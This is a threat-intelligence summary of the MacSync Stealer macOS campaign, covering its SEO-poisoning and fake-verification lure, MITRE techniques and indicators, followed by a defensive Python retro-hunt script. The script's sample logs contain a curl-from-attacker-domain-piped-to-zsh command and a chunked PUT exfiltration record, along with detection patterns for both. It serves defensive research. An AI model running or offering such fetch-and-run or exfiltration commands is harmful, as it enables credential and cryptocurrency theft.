CloudSEK researchers uncovered a multi-stage macOS campaign that uses SEO poisoning and ClickFix-style social engineering to trick users into running a malicious Terminal command that installs a staged loader and an AppleScript information stealer. The malware harvests browser credentials, cryptocurrency wallets, SSH keys, cloud configs and files, exfiltrates data via chunked HTTP PUT to attacker infrastructure, and can modify Ledger Live to enable transaction manipulation and persistence. #MacSyncStealer #LedgerLive
Keypoints
- Initial access is achieved via SEO poisoning: malicious search results for PDF downloads redirect victims to a fake verification page that instructs them to run a Terminal command.
- The user-run command decodes and pipes a remote script into zsh, launching a staged loader that executes further payloads in memory to evade static detection.
- The final payload is an AppleScript-based information stealer (MacSync Stealer) that harvests browser credentials, extension data (crypto wallets), keychains, SSH keys, cloud configs, and targeted file types from user folders.
- Stolen data is compressed into /tmp/osalogging.zip and exfiltrated to attacker-controlled infrastructure using chunked HTTP PUT uploads with API-key authentication headers.
- The campaign specifically targets desktop and browser cryptocurrency wallets (including Ledger Live) and can replace internal application components (app.asar, Info.plist) and re-sign the application to maintain long-term financial persistence and enable transaction tampering.
- Infrastructure and artifacts tied to the campaign include domains (bracesarlington.com, datacloudhost4.baby, allfile.me, b.mou.ir), a persistent API key token, temporary archive paths, and a public analysis repository on GitHub for defensive research.
MITRE Techniques
- [T1189] Drive-by Compromise - SEO poisoning is used to present malicious search results and redirect victims to a fake verification page: "The infection chain begins with SEO poisoning targeting users searching for downloadable PDF versions of books."
- [T1204] User Execution - Social engineering (ClickFix-style fake verification) persuades users to open Terminal and execute a malicious command: "The page displayed a fake human verification screen … instructing them to open Terminal and execute a command."
- [T1059.006] AppleScript - The loader retrieves and executes AppleScript payloads to perform data collection and remote instructions: "The response contains the core AppleScript malware responsible for data collection."
- [T1059] Command and Scripting Interpreter - The attack uses zsh and piping remote scripts into the shell to execute code: "…pipes it directly into zsh for execution."
- [T1027] Obfuscated Files or Information - Payloads are embedded as Base64 and gzip-compressed content to evade static analysis: "The second-stage script retrieved from the attacker infrastructure contains an embedded payload encoded in Base64 and compressed using gzip."
- [T1560.001] Archive Collected Data - Collected artifacts are compressed into a ZIP archive before exfiltration: "Collected data is compressed into an archive: /tmp/osalogging.zip"
- [T1041] Exfiltration Over C2 Channel - The archive is uploaded to the command-and-control server using chunked HTTP PUT requests: "the archive is uploaded to the command-and-control server using chunked HTTP PUT requests"
- [T1555.003] Credentials from Web Browsers - The malware enumerates browser profiles and extracts Login Data, cookies, key4.db, logins.json, and extension IndexedDB storage to steal credentials and wallet data: "The malware enumerates browser profile directories for Chromium-based browsers … and Gecko-based browsers (Firefox). It targets files such as: Login Data … key4.db … logins.json …"
- [T1574] Hijack Execution Flow (application modification) - The campaign modifies Ledger Live application components (app.asar, Info.plist) and re-signs the binary to enable persistent manipulation: "the application is re-signed using: codesign -f -s -"
Indicators of Compromise
- [Domain] attacker C2 and download hosts - bracesarlington.com, datacloudhost4.baby, and 2 more domains (allfile.me, b.mou.ir)
- [URL] SEO-poisoned redirect and fake verification pages - https://allfile.me/loading/?t=Inspired%20%20How%20To%20Create%20%20Products%20Customers%20Love%20%20English%20Edition, https://b.mou.ir/renhancef/84974J166D/… (poisoned search result)
- [File Path] temporary archive and staging folders used by the malware - /tmp/osalogging.zip, /tmp/sync* (staging and compressed exfiltration archive)
- [Filename] malicious installer artifact referenced in the social-engineering page - hidenn-gift.application/macOsAppleApicationSetup421415.dmg
- [Header / API Key] request authentication token observed in C2 communication - api-key: 5190ef1733183a0dc63fb623357f56d6
- [Application Path] targeted wallet application path and modified components - /Applications/Ledger Live.app (replaced components: app.asar, Info.plist)
- [Repository] public analysis/resource used for research - https://github.com/m1r3dk/macsync-stealer-analysis
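The indicators and techniques above translate directly into a retro-hunt over endpoint and proxy telemetry. The following Python script is an added example for defenders and is not from the CloudSEK report or its analysis repository; it matches the domains, API key and temporary paths listed on this page, and adds two constructed heuristics that go beyond the single command the report shows: any downloader whose output is piped (possibly through decoders) into a shell, and any HTTP PUT using chunked transfer encoding. The sample log lines are constructed for illustration, and the log formats are assumed rather than those of any particular EDR or proxy.

```python
"""Retro-hunt telemetry against the MacSync Stealer indicators summarised on this page.
Added example; the sample log lines and the behavioural heuristics are constructed and
are not taken from the CloudSEK report."""
import re
from collections import Counter
from dataclasses import dataclass

# Indicators taken from the write-up summarised on this page.
IOC_DOMAINS = ("bracesarlington.com", "datacloudhost4.baby", "allfile.me", "b.mou.ir")
IOC_API_KEY = "5190ef1733183a0dc63fb623357f56d6"
IOC_PATHS = (re.compile(r"/tmp/osalogging\.zip"), re.compile(r"/tmp/sync\w*"))

# Behavioural heuristics (constructed, broader than the one command in the report):
# a downloader whose output is piped, possibly via decoders, into a shell, and an
# HTTP PUT with chunked transfer encoding, the upload style the report describes.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|(?:[^|]*\|)*\s*(?:zsh|bash|sh)\b", re.I)
CHUNKED_PUT = re.compile(r"\bPUT\b.*Transfer-Encoding:\s*chunked", re.I)


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based index into the scanned telemetry
    rule: str      # which indicator or heuristic fired
    evidence: str  # the matched fragment, for the analyst to eyeball


def scan(lines):
    """Return one Finding per (line, rule) hit; a single line may trigger several rules."""
    findings = []
    for n, line in enumerate(lines, start=1):
        lower = line.lower()
        for domain in IOC_DOMAINS:
            if domain in lower:
                findings.append(Finding(n, "ioc_domain", domain))
        if IOC_API_KEY in lower:
            findings.append(Finding(n, "ioc_api_key", IOC_API_KEY))
        for pat in IOC_PATHS:
            m = pat.search(line)
            if m:
                findings.append(Finding(n, "ioc_path", m.group(0)))
        m = PIPE_TO_SHELL.search(line)
        if m:
            findings.append(Finding(n, "pipe_to_shell", m.group(0)))
        m = CHUNKED_PUT.search(line)
        if m:
            findings.append(Finding(n, "chunked_put", m.group(0)))
    return findings


def summarize(findings):
    """Count hits per rule, useful for prioritising which hosts get a full forensic look."""
    return dict(Counter(f.rule for f in findings))


# Constructed telemetry: EDR-style process command lines and proxy records.
SAMPLE_LOGS = [
    'proc: user=alice cmd="curl -s https://datacloudhost4.baby/x | base64 -d | zsh"',
    'proc: user=alice cmd="zip -r /tmp/osalogging.zip /tmp/sync1234"',
    "proxy: PUT https://bracesarlington.com/upload Transfer-Encoding: chunked "
    "api-key: 5190ef1733183a0dc63fb623357f56d6",
    "proxy: GET https://example.org/index.html Host: example.org",
    'proc: user=bob cmd="curl -s https://example.org/install.sh | bash"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOGS)
    for f in hits:
        print(f"line {f.line_no}: {f.rule:<14} {f.evidence}")
    print(summarize(hits))
```

The last sample line matches only the pipe-to-shell heuristic and no indicator, which is the intended behaviour: the heuristic is there to surface ClickFix-style executions that use infrastructure the report does not list, at the cost of some benign installer one-liners that an analyst then has to clear.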